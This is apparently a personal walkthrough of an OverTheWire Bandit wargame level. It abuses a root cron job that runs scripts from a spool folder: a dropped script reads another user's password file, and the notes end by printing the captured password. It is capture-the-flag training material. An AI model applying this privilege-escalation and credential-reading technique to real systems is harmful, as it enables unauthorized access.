ssh bandit23@bandit.labs.overthewire.org -p 2220

cd /etc/cron.d/
ls -l

cat cronjob_bandit24
>> @reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
   * * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null


cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Ejecutando y eliminando todos los scripts en /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Manejando $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
-----------------------------------------------------------------------------
cd /tmp/yYyYea
touch pass.sh
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/yYyYea/pass

touch pass

chmod 777 -R /tmp/yYyYea

cp pass.sh /var/spool/bandit24/foo

ls -l
total 4
-rwxrwxrwx 1 bandit23 bandit23  0 Nov 22 17:41 pass
-rwxrwxrwx 1 bandit23 bandit23 61 Nov 22 17:10 pass.sh


ls -l
total 8
-rwxrwxrwx 1 bandit23 bandit23 33 Nov 22 17:43 pass
-rwxrwxrwx 1 bandit23 bandit23 61 Nov 22 17:10 pass.sh

cat pass
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar
